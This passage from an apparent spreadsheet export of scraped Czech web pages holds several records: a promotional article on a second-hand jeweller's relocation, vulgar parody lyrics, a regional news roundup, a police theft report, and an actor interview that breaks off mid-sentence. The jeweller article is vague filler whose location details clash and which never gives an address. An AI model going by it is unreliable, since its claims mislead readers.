sbírky. To je vlastně kouzlo second handu: nikdy nevíte, co za poklad najdete! Nová lokalita tak nabízí nejen lepší přístup, ale i možnost objevovat vintage styl, který se v posledních letech vrací do módy. Kategorie Dostupnost Šperky Vždy dostupné Oděvy Pravidelně doplňováno Domácí dekorace Omezený výběr Nová lokalita a její výhody Nová lokalita přestěhovaného second handu zlatníky nabízí celou řadu výhod, které si rozhodně zaslouží váš zájem. Za prvé, umístění je klíčové – nachází se v srdci města, kde se snoubí atmosféra trendy obchodů a historických památek. Díky tomu je snadno dostupný nejen pro stálé zákazníky, ale také pro nové návštěvníky, kteří si chtějí udělat výlet za skvělými nákupy. Představte si procházku po ulicích, kde si můžete po telefonu objednat zlaté šperky, a pak si je vyzvednout přímo v obchodě s výhledem na náměstí. Co víc si přát? Dále se v nové lokalitě zlatníků můžete těšit na rozšířenou nabídku . Místo dosavadního výběru vintage kousků zde najdete nejen unikátní šperky, ale také moderní designéry a ručně vyráběné kousky, které jinde nenajdete. Ceny zůstávají příznivé, což z druhého ruky činí lákavou alternativu pro každého, kdo chce šetřit, a zároveň mít něco speciálního. A co teprve ty příběhy za těmito kousky – každý šperk má svůj vlastní život, který vám pracovníci obchodu rádi přiblíží. Mezi Návštěvníky je velmi oblíbená možnost vyzkoušení šperků přímo na místě. Každý si může osahat a vyzkoušet, zda daný kousek opravdu sedne. Nebojte se, pocit vyzkoušení si po práci se skleničkou vína hned tak někdo neodpustí. A vyrážíte-li s kamarádkou, nebo s rodinou, uvidíte, že společné vybírání může být nejen nákupní zážitkem, ale i skvělým dnem stráveným s blízkými. Abychom to shrnuli, zde je krátký seznam výhod, které nová lokalita přináší: Vynikající lokalita – snadná dostupnost a atraktivní prostředí Široká nabídka - moderní šperky a vintage kousky Možnost vyzkoušení – šperky si můžete osahat a vyzkoušet Příběhy za šperky – každý kousek má svůj vlastní příběh Jak najít second hand zlatníky Pro všechny, kteří touží po unikátních kouscích z druhé ruky, máme radostné zprávy! Nová adresa second hand zlatníků je tu, a rozhodně není ve stínu. Naleznete ho v příjemné čtvrti u parku , kde se snoubí kreativita s kouzlem městského života. Prioritou při hledání tohoto pokladu je osvědčený způsob – doporučení od přátel a místních. Kdo jiný by měl mít lepší přehled než ti, kteří tam už byli a objevili něco výjimečného? Abychom vám pomohli ve vašem pátrání, zde je několik tipů, které vám usnadní výběr a hledání: Navštivte sociální sítě – čtěte recenze a sledujte trendy na Instagramu, kde se influencerky chlubí svými úlovky. Zapojte se do místních skupin – zde najdete komunitu, která ráda sdílí své tipy a triky na nalezení těch nejlepších kousků. Sledujte akce a výprodeje – sezónní akce jsou skvělou příležitostí, jak získat zboží za nižší ceny. Kromě toho, nový second hand přichází s různými službami, které byste rozhodně neměli přehlédnout. Například, vybrané kousky můžete získat za speciální ceny na základě vašich preferencí. Nenechte si ujít příležitost potkat se s majiteli obchodu, kteří často organizují workshopy zaměřené na údržbu a stylizaci vintage šperků. Takže, když se nad tím zamyslíte, proč neudělat z běžné nákupní akce společenskou událost? Bez ohledu na to, zda jste milovníkem starožitností, nebo hledáte něco modernějšího, jakákoli cesta do tohoto nového obchodu slibuje dobrodružství. Na vlastní oči se přesvědčíte, že co se nám zdá být obyčejným kouskem, může mít uvnitř příběh, který čeká na to, aby byl odhalen. Tak na co ještě čekáte? Objevujte, prozkoumávejte a hlavně se bavte! Nejlepší tipy pro nákupy v zlatnících Nakupování v zlatnictví může být jako pátrání po pokladu. Chcete najít nejen krásný šperk, ale také skvělou cenu. Pokud plánujete návštěvu second hand zlatníka, zde je několik tipů, které vám mohou pomoci v této vzrušující cestě za nákupy. Porovnávejte ceny: Nezapomeňte se podívat na ceny podobných výrobků v různých obchodech. Cena zlata se sice může lišit, ale pokud najdete srovnatelné zboží, získáte lepší představu o tom, co je dobrá nabídka. Zaměřte se na detaily: Při prohlídce šperků se zaměřte na detaily jako je kvalita zpracování a použité kameny. I ten nejmenší šperk může skrývat velké překvapení, pokud je pečlivě vyroben. Nebojte se vyjednávat: Zvlášť v second hand zlatnictví můžete mít větší prostor na vyjednávání. Můžete prostě zeptat, zda je možné cenu snížit nebo zda existují nějaké aktuální slevy. Kupujte srdcem: Zlatnictví není jen o penězích; hodně záleží na vašem osobním vkusu. Najděte něco, co vám opravdu učarovalo a co můžete nosit s radostí. Dalším aspektem, na který byste měli myslet, je důvěryhodnost obchodu. Vždy je dobré se podívat na hodnocení a recenze ostatních zákazníků. Ať už nakupujete jako zkušený znalec nebo poprvé, zajistěte si, že obchod má dobrou pověst. A kdo ví, možná narazíte na něco, co se pro vás stane rodinným dědictvím! Také bych doporučil neváhat se vrátit, pokud první kolo nákupů neuspěje. Často se stává, že novinky přicházejí a nabízí jedinečné příležitosti za rozumné ceny. Dělte se o své zážitky se svými přáteli a získejte tipy z první ruky. Nákupy v zlatnictví mohou být nejen úžasné, ale také zábavné a osvěžující dobrodružství! Zkušenosti zákazníků na nové adrese Na novém místě se zákazníci zdají být nadšení! Mnoho z nich už vyzkoušelo, jaké to je nakupovat ve second handu na nové adrese, a recenze jsou více než pozitivní. Uživatelé chválí nejen rozšířený výběr zboží, ale také příjemnou atmosféru, která je na nové lokaci cítit. Zde je několik postřehů, které se objevily v průběhu prvních týdnů: Moderní a prostorné prostředí: Nové prostory mají dostatek místa, což zákazníkům umožňuje procházet si výběr v pohodě. Vstřícný personál: Podle mnoha zákazníků je personál nejen nápomocný, ale také znalý a ochotný poradit s výběrem. Skvělý výběr: Kromě šperků a kabelek, které byly vždy oblíbené, nyní zákazníci objevují i další módní kousky z minulosti. Zajímavé je, že někteří lidé si už vzpomněli na své první zákupy v zlatnickém second handu a jak se díky novému prostoru atmosféra na místě změnila. Jedna zákaznice dokonce sdílela, že po návštěvě si připadala jako znovuzrozená, když našla zlatý prsten, který dokonale doplnil její styl. „Je to jako hledat poklad, který vás rád přivítá zpět, když jste mu odešli na chvíli,“ řekla s úsměvem. Hodnocení Vlastnost Poznámky ⭐️⭐️⭐️⭐️⭐️ Výběr Různé trendy a vzory ⭐️⭐️⭐️⭐️ Personál Přátelský a informovaný ⭐️⭐️⭐️⭐️⭐️ Atmosféra Útulná a pohodová Celkově vzato, nová adresa se zdá být trefou do černého. Je to místo, kde si můžete nejen nakoupit, ale také užít čas trávený mezi lidmi, kteří sdílí váš vkus a lásku k módě. Pokud jste ještě nezkusili, přidejte se k řadě spokojených zákazníků a objevte nové kouzlo second handu v této lokalitě! Budoucnost second hand zlatníků v regionu V posledních letech se trend second handů a recyklované módy stal hit. Zlatníci v regionu, kteří se rozhodli tento přístup aplikovat, mají před sebou zajímavou budoucnost. Na první pohled by se mohlo zdát, že staré a opotřebované šperky nemají co nabídnout, ale opak je pravdou. Mnoho zákazníků hledá jedinečné kousky, které vyprávějí příběhy a skrývají v sobě duši. V tom tkví potenciál místních second hand zlatníků. Proto by se měli podnikatelé zaměřit na: Kvalitu : Zákazníci si chtějí být jisti, že kupují autentické a kvalitní šperky. Udržitelnost : V dnešním světě se stále více přihlíží k ekologickým aspektům výroby a prodeje. Unikátnost : Každý kus by měl mít příběh – ať už jde o dědictví, nebo o kousek s vlastním stylem. Pokud se podíváme na konkrétní příklady z regionu, uvidíme nárůst poptávky po restaurovaných a refurbished špercích. Vybavování těchto klenotů může mít příznivý dopad na ceny a dostupnost, a tak mohou second handy zlatníků nabídnout skvělé obchodní příležitosti. Jestliže se šikovně marketingově uchytí, mohou být pro zákazníky zcela neodolatelné. Tabulka: Očekávané trendy v second hand zlatnictví Trend Popis Online prodej Rostoucí popularita e-commerce, díky které si lidé mohou nakupovat z pohodlí domova. Personalizace Zákazníci chtějí kousky, které lze přizpůsobit jejich vkusu a stylu. Vzdělávání zákazníků Informování zákazníků o historii a hodnotě starších šperků. Toto vše naznačuje, že je světlá, pokud se dokážou adaptovat a reagovat na aktuální potřeby trhu. Klíčovým prvkem úspěchu bude spojení tradice a inovace, což by mohlo vést k úspěšnému hnutí v oblasti šperků. Jak second handy ovlivňují trh s šperky Dnes není nic neobvyklého narazit na second handy, které nabízejí šperky a bižuterii. Staly se z nich malé poklady, které lákají nejen milovníky vintage ale i ty, kteří chtějí ušetřit . Razantní vzestup zájmu o second handy přetváří celý trh s šperky, čímž se zmenšuje prostor pro tradiční zlatnictví. Kde jinde si za pár korun pořídit unikátní kousek, který nepochybně vypráví svůj vlastní příběh? Co všechno ovlivňuje tuto změnu? V prvé řadě se zaměřme na ekonomické faktory . V dnešní době, kdy se málo kdo vyhne úsporám, je výhodnost second handů nepopiratelná. Nákup šperků z druhé ruky často přichází s atraktivními cenovkami, navíc šperky mají tendenci mít menší negativní dopad na životní prostředí, což je další motivací pro řadu spotřebitelů. Mnozí lidé se snaží o minimalismus a udržitelné nakupování, což druhotný trh s šperky skvěle splňuje. Přehled trendů v oblasti second hand šperků ukazuje, jak se mění chuť veřejnosti: Vintage kousky – unikátní trendy z minulých dekád. Ruční výroba – podpora místních řemeslníků. Udržitelnost – snaha o ekologičtější přístup k módě. Tyto faktory ale zároveň kladou větší tlak na zlatníky, kteří musí neustále inovovat a hledat způsoby, jak se odlišit. Zajímavou taktikou může být i spolupráce se second handy, což by mohlo přinést oběma stranám zisky a nové zákazníky. Kromě toho se stále více objevují výstavy a trhy, které spojují tradiční řemeslo s moderním twistem, čímž představují šperky jako umění a ne jen jako zboží. Časté Dotazy Q&amp;amp;A: Kam se přestěhoval second hand zlatníky: Exkluzivní odhalení nové lokace Otázka 1: Co je to second hand zlatníky a co nabízí? Odpověď: Second hand zlatníky je specializovaný obchod, který se zaměřuje na prodej použitých a vintage zlatých šperků. Nabízí široký výběr produktů, od prstenů a náhrdelníků po náušnice a jiné doplňky. Výhodou je, že zákazníci mohou najít unikátní kousky za dostupnější ceny než v tradičních zlatnictvích. Otázka 2: Proč se second hand zlatníky přestěhoval? Odpověď: Přestěhování second hand zlatníků bylo motivováno několika faktory, včetně potřeby většího prostoru, lepší dostupnosti pro zákazníky a snahy vytvořit příjemnější nákupní prostředí. Nová lokalita nabízí také vyšší viditelnost a větší potenciál pro rozšíření sortimentu. Otázka 3: Kde se nachází nová lokalita second hand zlatníků? Odpověď: Nová lokalita second hand zlatníků se nachází v centru města, konkrétně na ulici, která je dobře dostupná hromadnou dopravou i autem. Přesné adresy a další detaily o umístění budou brzy zveřejněny na oficiálních webových stránkách obchodu. Otázka 4: Jaké novinky mohou zákazníci očekávat v novém obchodě? Odpověď: V novém obchodě se zákazníci mohou těšit na rozšířenou nabídku šperků, nové kolekce a časté akce a slevy. Plánují se také tematické výstavy a workshopy zaměřené na péči o šperky a jejich údržbu. Přijďte si prohlédnout novou expozici a objevte zbrusu nové kousky! Otázka 5: Bude v novém obchodě možnost prodeje nebo výkupu šperků? Odpověď: Ano, second hand zlatníky i nadále poskytuje služby výkupu a prodeje šperků. Zákazníci budou mít možnost nabídnout své použité šperky k prodeji nebo je vyměnit za jiné kousky. Tento proces probíhá pod odborným dohledem, aby byla zajištěna jejich hodnota a kvalita. Otázka 6: Jaké jsou plány pro budoucnost second hand zlatníků? Odpověď: Vzhledem k úspěchu a zájmu o koncept second hand zlatníků mají majitelé v plánu nejen rozšiřovat nabídku v nové lokalitě, ale také zvažují otevírání dalších poboček v dalších městech. Cílem je nabídnout unikátní a udržitelné šperky širšímu publiku. Doufáme, že vás naše odpovědi zaujaly a že se brzy setkáme v novém second hand zlatníků! Závěrečné myšlenky Kam se přestěhoval second hand zlatníky: Exkluzivní odhalení nové lokace! Jak jste se dozvěděli, náš oblíbený second hand se přestěhoval na zcela novou adresu, která nabízí nejen větší prostor, ale také rozšířený výběr luxusního šperkařského zboží. Pokud máte chuť na objevování unikátních kousků, které dodají šmrnc vaší sbírce nebo outfitům, rozhodně byste neměli tuto novou lokalitu minout. Zároveň slibujeme, že se u nás neztratíte – a pokud tak přece jen, nezapomeňte, že každý zmatenej zlatník někdy někde začínal! Přijďte se podívat, co nového jsme pro vás nachystali, a užijte si nákupy plné skvostu a elegance. Uvidíme se na nové adrese, protože výjimečné kousky si zaslouží výjimečné místo! Nenechte si ujít: Smash móda: Jak nosit moderní styl s twistem Lebanon dress code: Jak se obléknout pro cestu do Libanonu Dress code pohřeb: Jak se obléknout s úctou na smuteční obřad Bohempia : Česká značka, která revolucionizuje eco-friendly sportovní obuv Nude rtěnky: Vyberte odstín, který zvýrazní vaši přirozenou krásu Rubrika transition_slide Móda</t>
  </si>
  <si>
    <t>20241201_292_3474232262_c04bd2c1e8a4f8635c26.html</t>
  </si>
  <si>
    <t>c04bd2c1e8a4f8635c26</t>
  </si>
  <si>
    <t>Ožralá jsi jak ta kráva (Olympic - Jasná zpráva) - Morčata na útěku - Hlavně se s tím nesrat (2004)</t>
  </si>
  <si>
    <t>Ožralá jsi jak ta kráva ( Olympic - Jasná zpráva) - Morčata na útěku - Hlavně se s tím nesrat (2004) Hlavně se s tím nesrat (2004) 1) Skončili jsme jasná zpráva, Ožralá seš jak ta kráva, zas Doma nezbyl vůbec žádnej chlast ! Přes flašku tě vidím matně, Celou noc ti bylo špatně, moc Na záchytce voláš o pomoc. R) Šavle s vůní jablečnou, pozvracená zem, na hajzlu, kde urvala si šňůru. Teď si přijdeš zbytečnou, proč já tady jsem, mám po tobě uklízet tu fůru, vyblitou fůru, kurvafix fůru. 2) V ruce už máš zase flašku, radši si dám páva hašku, hned potom zrůžoví mi celej svět. Byly jsme zas pěkně sjetí, no to budou krásný děti, zas myslím, že seš zralá na provaz 3) Nechci se dívat na obludu, do hospody radši pudu, včil víc jak dvacet rumů je můj cíl Asi jsem měl šedej zákal Farář mě na zpověď zlákal, zmrd svatba s tebou byla moje smrt. R) Šavle s vůní jablečnou, pozvracená zem, na hajzlu, kde urvala si šňůru. Teď si přijdeš zbytečnou, proč já tady jsem, mám po tobě uklízet tu fůru, vyblitou fůru, kurvafix fůru. videoklip Přidej i ty svuj názor! Všechny texty jsou chráněny autorskými právy jejich vlastníků a jsou poskytnuty pouze pro vzdělávací účely. Pro více informací o autorovi tohoto textu navštivte tyto stránky. Autor: admin@teenage.cz</t>
  </si>
  <si>
    <t>20241201_293_3474219494_a23a2a4a38b95b71cfef.html</t>
  </si>
  <si>
    <t>a23a2a4a38b95b71cfef</t>
  </si>
  <si>
    <t>Souhrn aktualit ze Žďárska: advent začíná, exekuce na Žďársku a horor u Bolešína</t>
  </si>
  <si>
    <t>Souhrn aktualit ze Žďárska: advent začíná, exekuce na Žďársku a horor u Bolešína Žďársko vítá advent rozsvícením stromů Adventní čas na Žďársku přináší tradiční události, které rozzáří nejen vánoční stromky, ale i tváře návštěvníků. Připravili jsme přehled rozsvěcování stromečků v regionu , od Velkého Meziříčí po Žďár nad Sázavou , kde na vás čekají jedinečné programy plné hudby, jarmarků a radostných okamžiků pro celou rodinu. Žďársko Losenice má mistra světa v silovém sportu Na Vysočině, konkrétně ve Velké Losenici na Žďársku, žije novopečený mistr světa a světový rekordman. Na říjnovém mistrovství světa v mrtvém tahu v Trnavě zvítězil v kategorii dorostenců Josef Scholz , který při své váze pětasedmdesáti kilogramů zvedl činku o váze 260 kilogramů. O pár týdnů později se pak stal rovněž evropským šampionem. Vánoční trhy oživí města na Žďársku Jarmarky, trhy a prodejní výstavy na Žďársku lákají v předvánočním čase návštěvníky svou jedinečnou atmosférou a pestrou nabídkou tradičních výrobků. Od konce listopadu do prosince se v regionu koná řada akcí, které nabízejí nejen originální dárky, ale i kulturní zážitky. play_fill Žďársko Bolešínská vyhlídka se objeví v hororu Vyhlídka Hraběcí stolek u Bolešína, známá svým výhledem na řeku Svratku , se stala kulisou pro nový hollywoodský horor Nosferatu. Tento film, který se brzy objeví v kinech, přinese nejen napětí, ale zviditelní na plátnech i lokace na Žďársku. Legendární Metal Jan končí v Herálci Kapela Metal Jan, působící na pomezí Čech a Moravy , se zapsala do historie místní hudební scény jako jedna z nejosobitějších a nejautentičtějších formací. Od svého vzniku v roce 1987 kombinovala tvrdé metalové riffy s poetickými texty a specifickým projevem, který oslovil stovky fanoušků. Po více než třech dekádách na scéně se rozhodla ukončit svou činnost , přičemž svůj poslední koncert odehrála v sobotu 30. listopadu v kulturním domě v Herálci. Krimi Zloděj vykrádal obchody v Novém Městě Až tříletý pobyt ve vězení hrozí osmadvacetiletému muži, který se vloupal do několika prodejen v Novém Městě na Moravě . Podniky se nacházely na Vratislavově náměstí a v ulicích Drobného, Masarykova, Žďárská a Křičkova. Muž z prodejen odcizil převážně peníze a tabákové výrobky. Pokusil se vniknout i do schránek výdejního boxu, což se mu nepodařil. Opilec ničil sloupky u Veselíčka Opilý muž s téměř dvěma promile alkoholu v krvi si na silnici u Veselíčka o víkendu nejspíš spletl směrové sloupky s boxovacími pytli. V opilostit je totiž poškodil. Navíc se v noci pohyboval u silnice bez reflexních prvků. Policisté ho proto odvezli na záchytku. Žďársko Bystřice vede v počtu exekucí Na Žďársku se tisíce obyvatel potýkají s dluhy a exekucemi , přičemž nejvyšší podíl postižených je v Bystřici nad Pernštejnem . Situace v regionu odráží celostátní trend, kdy sice klesá celkový počet exekucí, ale roste počet lidí čelících více exekučním řízením současně. Autor: Ondřej Švára Autor person Ondřej Švára</t>
  </si>
  <si>
    <t>20241201_294_3487250740_73b64468b2ea390ddf65.html</t>
  </si>
  <si>
    <t>73b64468b2ea390ddf65</t>
  </si>
  <si>
    <t>Povedená dvojice</t>
  </si>
  <si>
    <t>Povedená dvojice CHOMUTOVSKO - Zlodějský tandem dopaden. Totožnost muže a ženy, kteří se poslední dobou podle všeho živili převážně krádežemi zboží z různých prodejen na Chomutovsku, policisté odhalili. Většinu krádeží nebo pokusů o ně měli dotyční spáchat společně, některé z nich uskutečnil sám 38letý Chomutovan. Ten měl kromě krádeží v obchodech již v průběhu léta otevřeným oknem vniknout do přízemního bytu v širším centru města a odcizit z něho zlatý řetízek s přívěškem a další věci v celkové hodnotě přes 35 tisíc korun. Řetízek, jež dotyčný následně zastavil za 10 tisíc korun v zastavárně, policisté zajistili a vrátili majiteli. V listopadu měl stejný muž při návštěvě svého známého u něho doma využít chvíle, kdy kamarád na chvíli opustil pokoj a sebrat mu mobil a hotovost přes 10 tisíc korun. Kromě toho měl v průběhu podzimu navštívit několik prodejen v Chomutově i Jirkově , pokaždé se stejným cílem, tedy ukrást třeba oblečení, nářadí nebo potraviny a alkohol , což se mu někdy povedlo, jindy byl přistižen a odešel nebo utekl bez lupu. Na tyto „nákupy“ se s ním párkrát vydala i jeho již zmíněná 25letá kamarádka. Společně tak kradli například kabelky, oblečení nebo zlaté šperky. Kromě obchodů dotyční neobešli ani hotel v centru Chomutova , z jehož recepce si odnesli starožitný nefunkční telefon ze dřeva. Aby toho nebylo málo, tak při společném „výletu“ natankovali u čerpací stanice v Krušných horách do osobního vozidla benzin, za který nezaplatili. Chvíli poté je však zadržela policejní hlídka. V současné době vedou policisté proti oběma trestní řízení. Muži za trestné činy krádeže a porušování domovní svobody hrozí u soudu až dvouletý trest odnětí svobody. Jeho mladší „kolegyně“ by na tom mohla být ještě hůře. Za krádež totiž byla letos v létě odsouzena k podmíněnému trestu odnětí svobody na sedm měsíců se zkušební dobou až do března roku 2026. Kvůli tomu jí za pokračující krádeže soud může poslat za mříže až na tři roky. por. Mgr. Miroslava Glogovská Autor: REGIONUSTI.CZ</t>
  </si>
  <si>
    <t>87</t>
  </si>
  <si>
    <t>51</t>
  </si>
  <si>
    <t>20241201_295_3474370374_be3907b528628fd9abc0.html</t>
  </si>
  <si>
    <t>be3907b528628fd9abc0</t>
  </si>
  <si>
    <t>Učí kolegy nosit klobouky</t>
  </si>
  <si>
    <t>Učí kolegy nosit klobouky Rubrika: ROZHOVOR Otakar Brousek ml. (67) fandí synovi v Monkey Business, je milovník rychlých aut i elegán PRAHA – Potkali jsme se v Divadle Viola, kde měla svou zatím poslední premiéru komedie Zločin lorda Artura Savila. Otakar Brousek ml. (67) dorazil samozřejmě v klobouku. Neodmyslitelně k němu patří, neodkládá ho ani v autě. A věděli jste, že k lásce k této důstojné pokrývce hlavy přesvědčil i své slavné herecké kolegy? Pane Brousku , prý jste klobouky naučil nosit i pana Přeučila . Je to pravda? „No jasně! V devadesátých letech jsme hráli v Karlíně Zasněženou romanci, což jsou třicátá léta. Udělali nám krásný kostýmy i s klobouky. Začali jsme s Pavlem Trávníčkem chodit za Přeučkou a říkali mu: Hele, to bys měl nosit, protože ti to sluší! Tehdy s klobouky začal a teď se jimi honosí.“ (směje se) Jak jste to s nimi měl vy? „Já už je nosil v osmdesátých letech. Tehdy mi táta přivezl hezký džínový klobouk z Mexika a od té doby se to se mnou a s nimi táhne.“ Je ještě někdo, koho jste přivedl k lásce k této pokrývce hlavy? „Donutili jsme k tomu i Mirka Moravce! Měl z vlasů takovou přehazovačku a my mu říkali: Mirku, vykašli se na to, to nevypadá dobře. Pak se ostříhal, měl velkou, ale pěknou hlavu a začal nosit klobouky. A další byl Mirek Meduna.“ Vy jste takový kloboukový guru. „To ne. (směje se) Ale klobouk je dobrý vynález, protože vám nesvítí do očí a neprší za krk!“ Kolik jich doma máte? „Přes dvacet, není to zase tolik.“ Zmínil jste, že první klobouk vám dovezl táta. Nosil je taky? „Ne, ten měl rád bekovky.“ S tatínkem jste si ještě společně zahráli. V kterém divadle jste se potkali? „V Divadle ABC . Hráli jsme nejdřív Tři mušketýry, ale neměli jsme spolu dialog. Táta hrál starého d’Artagnana, který umírá, a já byl Athos. Mladý d’Artagnan byl Filip Blažek . Bylo to moc hezký představení. Pak jsme s tátou dělali Pygmalion. Já Higginse a on Pickeringa. Režíroval to Ota Ševčík, to byla jeho poslední režie.“ A taky poslední, co jste si s tátou zahráli, že? „Je to tak. Bylo to mimořádný představení. Jarka Adamová mi dělala maminku. Já z ní měl strach, znal jsem ji z dětství, jak mě táta vodil po divadlech, ale nikdy jsem s ní nestál na jevišti. Bál jsem se jí a pak jsem zjistil, jakou měla před představením trému. Přišla premiéra, já jí zapaloval cigaretu, kterou měla ještě ve špičce, a my jsme se nemohli trefit, jak se jí třásla ruka. Tak jsem si řekl: Vidíš, je to taky jenom člověk.“ Jaký byl táta herecký kolega? Neměl tendence vám radit? „Nikdy jsme si nekecali do toho, jak roli budeme hrát. Stali jsme se na jevišti partnery. Táta mi nikdy neříkal, jak k roli přistupovat, jak na ni jít. Když jsem jako student hostoval na Vinohradech, posadil se jednou na druhou galerii, pak sešel dolů a řekl mi: Musíš přidat na hlase a pořádně to říkat, aby to bylo slyšet až tam nahoru. To si pamatuju. Technicky jo, ale jinakdo toho ani sestře, ani mně nemluvil.“ A vy jste za ním nikdy nešel? „Šel, když jsem na Kladně dostal Hamleta. Verše se na škole moc neučí, ale táta byl generace, která je uměla. Šel jsem za ním a ptal se: Prosím tě, jak mám toho Shakespeara říkat? A on: Vyndej text a pojď. Řekl mi pár věcí, co s tím, ale neporadil mi, jak ho mám hrát.“ Byl se na vás pak podívat? „Jo, to byl. Měl jsem před ním samozřejmě trému. Jednou jsem mu to na chalupěříkal:Já,když tam sedíš, tak mám strach. A on na to: Ty seš hloupej, my jsme první, kteří ti drží palce! Byl zlatý a dobrý divák. Když to bylo vtipný, tak se smál. Koukal se na ten kus ne jako profík, ale jako normální člověk.“ KTERÉHO BROUSKA CHCETE? Potkali jste se víckrát před kamerou než na divadle? „Taky ne! Dokonce jsme i se synem Ondrou byli všichni tři v jednom seriálu, ale nepotkali jsme se před kamerou, jen na natáčení. Ztoho je jedna veselá historka. Obsadili nás všechny, ale do fermanu napsali jen O. Brousek, nástup v 7.15. A my ne že bychom si třeba zavolali a zeptali se, ale ráno jsme se tam všichni sešli. Produkční pak prohlásila: To jste nemuseli, my chtěli jenom Ondřeje.“ (směje se) S ním se na jevišti alespoň setkáváte více? „Taky moc ne. Hráli jsme spolu na Fidlovačce, pak párkrát na Vinohradech. Ale že by nás vědomě obsazovali jako otce a syna, jako dobrou dvojku, to taky ne.“ Ondřej je výborný muzikant a člen kapely Monkey Business . Jste jejich fanouškem? „Jsem, ale byl jsem na nich asi jen dvakrát! (směje se) Davy už nevyhledávám, ale desky mám všechny! Samozřejmě je často a rád poslouchám. A Ondra mě zásobuje i jinou muzikou. Díky němu sleduju moderní scénu a máme svý úhlavní interprety a skupiny, který rádi posloucháme společně.“ Například? „Třeba v poslední době je to Jacob Collier , který tady měl koncert a Ondra na něm byl. Nebo Prince, to je neskutečný, co ten umí. Nebo posloucháme i vážnou muziku. Mám rád klavír, Ondra na něj hraje, takže posloucháme cokoliv.“ Vy jste taky hrál na klavír, ne? „Trošku. Já ale byl cvičená opice. Něco jsem se zahrát naučil, ale teoreticky hudbě nerozumím.“ Kde se to vzalo v Ondrovi? „Já nevím. Všichni jsme doma poslouchali muziku. Já bigbít, hardrock a můj táta pouštěl i vážnou hudbu, jazz, Ondra byl pořád obklopený muzikou.“ Pouštěl vám táta i Voskovce a Wericha? Protože vím, že je máte rád. „Měli jsme je doma a já si je pouštěl sám. I Hurvínka se Spejblem, protože Skupa je génius, a pak přišli Voskovec s Werichem, Vodňanský a Skoumal. Ještě za minulého režimu jsem sháněl všechny Werichovy nahrávky. Daly se najít různě podloudně, někdo měl něco na kazetě, nebo to bylo u zvukařů v rozhlase. Ale po revoluci všechno vyšlo, a to máme s Ondrou taky, úplně komplet.“ Vy jste Voskovce taky hrál, že? „Třikrát. Na Kladně jsme dělali Kata a blázna a Těžkou Barboru. A po rekonstrukci Divadla ABC na konci 90. let jsme hráli s Daliborem Gondíkem v Golemovi.“ ČERTŮV ŠVAGR GONDÍK S ním máte i rodinnou vazbu, váš syn se poprvé oženil s jeho sestrou Adélou. Kde jste se poznali? „V Divadle ABC . V devadesátkách jsme tam spolu dělali diskotéky. Jak končily muzikály, Dracula, Ježíš, tak tam herci za námi chodili, měli jsme narváno. Pořádali jsme diskotéky a zásadně jsme nehráli na přání.“ A pak jste spolu jezdili rallye. Jak k tomu došlo? „Za to může Dalibor , on je do aut blázen. Jezdil moderovat různé plesy a někde se seznámil s lidmi, kteří se potloukali kolem motoristického sportu. Přišel za mnou a říká: Budeme jezdit motokáry! Mistrovství republiky ve vytrvalostních závodech. Pak jsme je skutečně dva roky jezdili, potom ještě rok auta, jednodenní rallye, a já jsem Dalibora navigoval. A pak mě vzal na motorky do Ameriky .“ Prý jste na ně tehdy neměl řidičák. „No to je pravda! Dalibor , můj čertův švagr, jednou přišel a říká: Pojedeme do Ameriky ! Co tam budeme dělat? Jezdit na motorkách. Vždyť já nemám papíry! Uměl jsem jezdit, ale řidičák jsem neměl a udělat jsem si ho nestihl, takže jsem v Americe jezdil bez něj. V L. A. mě posadili na obrovskýho harleye a řekli: Jeď! Nejdřív jsem se vyděsil, ale pak mě z té motorky nesundali.“ Bylo těžké, aby vás k tomu přesvědčil? „Ne, já taky rád řídím. Už jako kluka mě bavilo šťourat se v autech, mít černý ruce od šmíru... Tátovi jsem vždycky, to mi bylo tak čtrnáct patnáct, říkal: Nechceš umýt auto? A on, že jo. Já si na ten dvůr zajedu sám. Dobře! Tak jsem se naučil s autem popojíždět. Když jednou přijel strejda z Anglie , ten měl jaguára, první, na co jsem se ho ptal, bylo: Nechceš umýt auto?“ (směje se) Uměl jste auta i spravit? „No jeje, já jsem si je vždycky opravoval sám. Bydleli jsme v Dejvicích , měl jsem spartaka a radil jsem se se sousedem: Hele, mně to nějak blbě zatáčí a tuhne. A on: To jsou svisláky. Co s tím? Musíš je vymontovat a já ti je opravím. Takto jsem se učil.“ Je vidět, že vás to opravdu bavilo. „Moc. Bratrancův děda měl auťáky, a my jsme mu občas pomáhali. Kluci, pojďte sem, potřebuju něco podržet. Tak jsme šli a koukali mu pod ruce. Pak jsem měl souseda, který vlastnil starý pragovky, tomu jsem taky pomáhal, tak jsem toho dost okoukal.“ To se vám mohlo hodit i v té Americe . Kolik jste toho s Daliborem projeli? „Přes dva tisíce kilometrů. Jeli jsme nahoru z Los Angeles na Sierru Nevadu , pak jsme sjeli dolů do Údolí smrti, odtud jsme jeli do Las Vegas , Arizony , Kingmanu , kde je historický muzeum nejstarší silnice Route 66, a zpátky do Kalifornie , do městečka Needles. Později jsem zjistil, že tam přespávali i Voskovec s Werichem. A my jsme tam přespali taky.“ Ještě na motorkách jezdíte? „Jo. Nejdřív jsem měl motorky po Daliborovi . On si pořídil nové a já od něj odkupoval starší. Pak jsem upadl, praskly mi dva obratle, tak jsem je prodal a deset let jsem nejezdil. Až loni o prázdninách mě napadlo: Já si koupím motorku. Tak jsem si jednu pořídil.“ Proč jste vlastně s Daliborem nechali těch aut? „Nebyl čas. Když to chcete dělat na nějaké úrovni, musíte se tomu věnovat. Tím, že je člověk zaměstnaný v divadle, nemá na to tolik času, kolik by potřeboval.“ Obdivuju, že jste se nebál. „Nebylo proč. Dalibor je vynikající řidič. Vyrůstal v Sokolově , kde měli cukrárnu. Jezdil tam se starou dodávkou a rozvážel zákusky. A takové laskonky, když se pohnou, jsou na maděru. Díky nim se naučil jezdit jemně a přitom rychle.“ Vyhráli jste také něco? „To ne. Když jsme jezdili rallye, měli jsme startovní číslo třeba 68 a skončili jsme padesátí třetí. Poslední jsme nebyli, ale nebyli jsme ani výjimeční. Jenom nás to bavilo.“ Ještě byste si do závodního auta sedl? „Klidně, nebojím se. Ale jak říkám, je třeba se tomu věnovat, není to o tom, že by si někdo sedl a jel. Když jsme jezdili motokáry, ptal jsem se tehdejšího mistra Evropy , kterému bylo tenkrát sedmnáct: Kdy se naučím jezdit tak dobře jako ty? No, to asi nestihneš. Proč ne? Já jezdím od čtyř let. Neměl jsem nárok.“ V kolika letech jste začínal? „Někdy v pětačtyřiceti. To už nedoženete, to se nedá. I práh strachu je v tom věku jinde. Já jsem se nebál o sebe, ale abych to nerozbil, protože technika je strašně drahá, to jsou milionový částky. Tak jsme jezdili 